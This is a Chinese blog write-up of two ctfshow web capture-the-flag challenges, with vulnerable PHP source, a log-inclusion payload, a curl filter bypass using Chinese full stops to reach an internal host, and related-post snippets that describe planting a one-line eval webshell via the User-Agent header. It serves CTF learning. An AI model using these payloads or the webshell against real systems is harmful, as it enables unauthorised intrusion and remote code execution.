ctfshow web AK杯

最新推荐文章于 2025-08-15 10:23:45 发布

原创最新推荐文章于 2025-08-15 10:23:45 发布 · 179 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#经验分享 #web安全

公开赛专栏收录该内容

15 篇文章

订阅专栏

签到_观己

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match('/php/i', $file)){
        die('error');
    }else{
        include($file);
    }

}else{
    highlight_file(__FILE__);
}

?>

最近rce做多了忘了本了，这里有个include我们直接日志包含就可以了

?file=/var/log/nginx/access.log

web1_观字

<?php

#flag in http://192.168.7.68/flag
if(isset($_GET['url'])){
    $url = $_GET['url'];
    $protocol = substr($url, 0,7);
    if($protocol!='http://'){
        die('仅限http协议访问');
    }
    if(preg_match('/\.|\;|\||\<|\>|\*|\%|\^|\(|\)|\#|\@|\!|\`|\~|\+|\'|\"|\.|\,|\?|\[|\]|\{|\}|\!|\&|\$|0/', $url)){
        die('仅限域名地址访问');
    }
    system('curl '.$url);
}

curl特性，句号可以代替小点来绕过
?url=http://192。168。7。68/flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

baozongwi

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

CTFshow web AK赛wp

HoAd'blog

01-26

636

CTFshow WEB AK赛ak赛 wp签到_观己web1_观字web2_观星web3_观图web4_观心总结 ak赛 wp 签到_观己正则匹配过滤了php，且大小写不敏感，后面又有include函数，已经是对php的伪协议的一个考点。 php被过滤，我们可以用data://伪协议发现allow_url_include没有开启，还得另寻他法。做题的时候没想到有日志包含，还是题做得太少了。 payload:file=/var/log/nginx/access.log 通过将一句话木马写入到UA中 &

CTFShow 2022——新手杯wp WEB题目

qq_60878323的博客

10-09

1422

小艾大佬的投稿支持 web AK了

参与评论您还未登录，请先登录后发表或查看评论

ctfshow(WEB AK赛)

m0_72125469的博客

03-11

1225

ctfshow webAK赛 web观己 web观字 web观星 web观图 web观心

ctfshow WEB AK赛

LYJ20010728的博客

06-14

4734

WEB AK赛签到_观己考点思路Payloadweb1_观字考点思路Payloadweb2_观星考点思路Payloadweb3_观图考点思路Payloadweb4_观心考点思路Payload 签到_观己考点文件包含思路盲猜一波flag在根目录下，所以直接读取试试 Payload 源码 <?php if(isset($_GET['file'])){ $file = $_GET['file']; if(preg_match('/php/i', $file)){

ctfshow-WEB AK赛

2202_75812594的博客

05-08

717

过滤了逗号，对于mid，substr可以用from()for()来绕过，对于where后面的条件，就用hex来绕过。最开始一直用mysql.innodb_table_stats来读表，也读出来一些表明了，看到那个FLAG_TABLE，读源码就是爆破key，将config.php进行openssl_encrypt进行加密，就可以拿到flag。当然也可以直接将加密后的数据在网页提交，然后用bp抓包也能得到flag。过滤了等于，like，那就绕过，相当于不等于。空格就不用多说，%0a，内联等都可以。

ctfshow-AK赛

blowed的博客

04-16

3086

ctfshow AK

CTFshow菜狗杯web wp

2201_75588208的博客

09-07

734

先分析一下源码, 首先是 intval()函数将参数id转换为数值型, id > 999直接die()结束程序, 也就是说我们传递的id不能大于 999, 明知道1000就是flag, 但不能直接传1000, 否则程序会直接die()结束, 传递的id 即不能大于999, 又需要查询 1000的值 , 这里我们可以通过 or( 逻辑或)来同时传递两个id, 一个id用于绕过intval($id) > 999 的验证, 另一个id 用来返回1000的查询结果, 也就是flag。

ctfshow-WEB AK赛-web2_观星

博客地址 www.sec0nd.top

02-27

1014

第一眼这个题目，跟前几天做过的很像点一个文章发现地址栏上有个id参数，应该是注入了令id=1’返回enheng?发现’被过滤了，fuzz测试过滤了空格、’、"、=、like、ascii、union、order by、|、sleep、。常用的盲注payload为payload=1^if(ascii(substr('flag',1,1))=104,1,0) 过滤了空格可以用括号代替；过滤了单引号可以用16进制代替；过滤了逗号，对于substr可以用 substr(database() from.

ctfshow-WEB_AK赛

qq_44657899的博客

08-01

5594

签到_观己（日志包含）文件包含一般下面几种协议，不过这些协议这道题都用不起：除了猜，还有日志包含。首先访问file=/var/log/nginx/access.log看日志文件是否存在。然后访问aaaaaaaaaaa，再查看日志文件，已经被记录到了日志文件中。因为url中会被编码，所以在UA中加入一句话木马<?php @eval($_GET['pass']);?>，成功写入日志。随后蚁剑链接：http://0bb8f2b6-74cb-4fd9-860d-a4d246c8aa1

CTFSHOW web_AK赛

yao_xin_de_yuan的博客

07-31

554

CTFSHOW web_AK赛签到——观己文件包含漏洞 php伪协议看源码过滤了php，开始想的是php伪协议，但是试了一下allow_url_include=off，data://用不了。最后尝试了一下直接读/flag，/flag.txt。发现在/flag.txt直接读出了flag. 日志包含传?file=/var/log/nginx/access.log过去发现nginx访问日志可以访问。写一句话<? eval($_POST['hack']);?>到UA里面，go。使用蚁剑

ctfshow web web ak赛观心

09-11

CTFShow的Web AK赛中，观心考点的payload可以参考以下内容。引用[1]提供了一系列关于Web AK赛观心考点的思路payload。引用中给出了一个源码示例，其中对传入的文件参数进行了校验。如果传入的文件名中包含"php"这个...

ctfshow web web ak赛

09-11

根据引用的代码，它包含了一些加密和解密操作，并根据GET参数中的image值来查找文件并显示图像。...结合这些信息，我无法直接确定ctfshow web web ak赛的含义。请提供更多相关信息以便我更好地帮助您。

CTFshow 击剑杯部分WP

Nancy523的博客

11-13

4732

摆烂了摆烂了太难了聪明的师傅已经组队打起月赛了试试能不能苟住前5 苟住了复现的后面再补充吧文章目录1.Misc中文识别带师2.Web简单的验证码easyPOP3.Pwnpwn01-My_sword_is_readypwn02-Precision_and_grace4.Osint英语阅读这是哪里卡鲁铁盒人家想玩嘛人有点多小城美食安装arph5.热身听歌识曲看图识妹进群得码 1.Misc 麻麻的只会一题其他的等复现再补充吧中文识别带师挺好玩一个题格局打开 linux nc进环境（注意进

CAIE人工智能一级认证备考经验分享：15天高效自学路径与资源利用

XIAOGAONL的博客

08-05

990

作为零基础起步的考生，在约15天的集中备考期内完成学习并通过考试，积累了一些高效利用官方资源和规划时间的经验，在此分享，希望能为有类似备考计划的同学提供参考。希望这份基于亲身经历的经验分享，能为你的备考之路提供清晰的规划和实用的方法参考。CAIE官方提供了“如荷学”小程序作为配套练习平台，其中包含按章节和模块划分的一级认证练习题和模拟试卷，题目质量高，与考试风格一致。运用“三遍法”中的第一遍和第二遍策略，开始刷“如荷学”小程序上的章节题和模块题。官方教材是知识基础，报名后领取的实操视频是技能提升的关键。

美创智能数据安全分类分级平台获“2025年网络安全优秀创新成果大赛”优胜奖！

美创科技的博客

08-14

394

美创智能数据安全分类分级平台，基于 AI 智能化技术，通过动态发现并精准识别对国家、组织和个人安全至关重要的各类分级数据，构建起高度贴合行业诉求的数据资产目录，有效满足数据安全合规及精细化安全防护的需求，其分类分级准确率更高达95%。平台全新上线「智能自检」功能，基于双 AI 模型协同校验机制，直击传统分类分级作业中人工复核效率低、分类分级质量难保证的痛点，让分类分级效率飙升至行业新高，更以逼近100%的精准率，让每一条数据的分级结果都经得起监管与业务的双重检验。

网络安全应急响应

鹿鸣天涯

08-14

953

logs/catalina.xx.log logs/host-manager.xx.log logs/localhost.xx.log logs/manager.xx.log 主要记录系统启、关闭日志、管理日志和异常信息。1）收集信息：操作系统版本，补丁，数据库版本，中间件/服务器，网络拓扑，受害范围，处置情况，提取日志（主机，安全设备，数据库等）1、web入侵：挂马、网页篡改（博彩/黑帽SEO等）、植入webshell，黑页，暗链等。入侵现象：如cpu过高，勒索界面，异常网络链接，安全设备告警等。

医院网络安全重保方案

最新发布

huluang的专栏

08-15

490

医院网络安全重保方案严格遵循《网络安全法》等国家标准，重点防护勒索软件和供应链攻击。方案构建基于零信任架构的动态防护体系，包括终端EDR防护、数据加密备份、网络分区隔离等措施，确保核心医疗系统RTO≤4小时。实施过程涵盖资产梳理、渗透测试、7×24小时监测等环节，并配套完善的交付文档体系。方案特别强调患者数据保护，要求数据库审计日志留存≥6个月，符合《个人信息保护法》要求。通过厂商驻场、应急演练等技术保障措施，实现攻击阻断率≥99%，全面满足三级等保要求，保障医院业务连续性。

网络的基本概念、通信原理以及网络安全问题

qq_73704268的博客

08-11

679

本文系统介绍了计算机网络的基础原理与安全机制。主要内容包括：1.网络本质是电压/电磁波信号传输，通过高低电平表示0/1数字信号；2.网络架构采用分层交换结构，家庭-交换机-核心交换机构成树状拓扑；3.网络通信依赖IP地址、MAC地址和端口号三重标识，通过校验码、超时重传等机制保障传输可靠性；4.网络协议作为通信规则，采用分层设计保证设备互联，但协议开放性带来安全风险；5.常见网络攻击包括监听、篡改、拦截和复制，其中协议层漏洞可能导致严重安全问题。文章重点分析了网络监听的技术原理和安全威胁，指出硬件层难以实现

微软推出革命性AI安全工具Project IRE，重塑网络安全防御新范式

Bar_artist的博客

08-09

939

Project IRE AI代表了逆向工程领域的技术飞跃，它通过整合传统安全分析工具与前沿AI能力，构建了前所未有的恶意软件检测体系。作为微软安全生态系统的重要组成部分，Project IRE AI的推出象征着AI在网络安全领域的角色转变——从辅助工具升级为主动防御的核心力量，为自动化威胁检测设立了全新行业标准。Project IRE AI带来的不仅是技术升级，更是一场防御理念的革命：从被动响应到主动预防，AI正成为网络安全攻防战中最具决定性的战略要素。核心技术解析：AI驱动的逆向工程革命。